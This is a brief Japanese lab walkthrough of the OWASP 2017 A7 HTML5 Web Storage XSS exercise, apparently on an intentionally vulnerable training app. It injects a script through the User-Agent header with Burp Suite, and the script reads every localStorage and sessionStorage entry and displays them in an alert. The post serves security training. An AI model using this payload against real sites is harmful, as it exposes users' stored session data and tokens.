Hello there, ('ω')ノ

 

OWASP 2017 ⇨ A7 ⇨ DOM-Based ⇨ HTML5 Web Strageを選択して。

 

 

ストレージの内容を確認することができて。

 

 

Burp Suiteでパラメータを確認して。

 

 

User-Agentのところに下記のスクリプトを入れ替えて。

<script>

　try{

　　var m = "";

　　var l = window.localStorage;

　　var s = window.sessionStorage;

　　for(i=0;i<l.length;i++){

　　　var lKey = l.key(i);m += lKey + "=" + l.getItem(lKey) + ";\n";

　　};

　　for(i=0;i<s.length;i++){

　　　var lKey = s.key(i);

　　　m += lKey + "=" + s.getItem(lKey) + ";\n";

　　};

　　alert(m);

　}

　catch(e){

　　alert(e.message);

　}

</script>

 

 

スクリプトでDOMの情報を取得できた。

 

 

Best regards, (^^ゞ